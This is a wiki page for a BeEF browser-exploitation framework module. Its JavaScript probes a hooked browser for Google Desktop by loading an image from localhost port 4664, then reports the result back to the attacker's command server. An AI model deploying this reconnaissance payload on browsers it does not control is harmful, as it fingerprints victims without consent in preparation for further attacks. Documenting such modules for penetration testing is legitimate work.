-
Notifications
You must be signed in to change notification settings - Fork 2.2k
Module: Detect Google Desktop
Haoxi Tan edited this page Jan 9, 2020
·
2 revisions
-
Objective: Detect Google Desktop
-
Authors: bcoles
-
Browsers: All
Uses image tags to detect Google Desktop on port 4664
var dom = document.createElement('b');
var img = new Image;
img.src = "http://127.0.0.1:4664/logo3.gif";
img.onload = function() { beef.net.send('<%= @command_url %>', <%= @command_id %>,'google_desktop=Installed', beef.are.status_success());dom.removeChild(this); }
img.onerror = function() { beef.net.send('<%= @command_url %>', <%= @command_id %>,'google_desktop=Not Installed', beef.are.status_error());dom.removeChild(this); }
dom.appendChild(img);
- Configuration
- Interface
- Information Gathering
- Social Engineering
- Network Discovery
- Metasploit
- Tunneling
- XSS Rays
- Persistence
- Creating a Module
- Geolocation
- Using-BeEF-With-NGROK